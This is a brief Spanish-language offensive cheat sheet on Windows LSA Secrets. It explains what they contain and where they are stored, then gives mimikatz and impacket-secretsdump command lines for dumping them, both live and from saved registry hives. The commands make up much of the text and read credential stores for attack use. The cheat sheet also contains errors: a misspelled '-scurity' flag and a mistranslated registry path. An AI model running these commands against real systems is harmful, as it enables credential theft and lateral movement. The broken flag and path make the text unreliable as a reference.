LSA Secrets

• Almacenamiento protegido donde se almacena la información crítica utilizada por el SYSTEM LSA. Contiene:

  • Registro de dominio en caché

  • Credenciales de usuario local

  • Clave de usuario y máquina DPAPI, etc.

• Esto se puede encontrar en el Registro; sin embargo, se requiere el privilegio SYSTEM: • SECURITY\Política\Secrets

Lsa Secrets: Dumping - Mimikatz - Online

./mimikatz.exe token::elevate

./mimikatz.exe lsadump::secrets

Lsa Secrets: Dumping - Mimikatz - Offline

./mimikatz.exe lsadump::secrets /system:C:\hives\SystemHive.hiv /security:C:\hives\SecurityHive.hiv

Lsa Secrets: Dumping - secretsdump

impacket-secretsdump -scurity "C:\hives\SecurityHive.hiv" -system "C:\hives\SystemHive.hiv"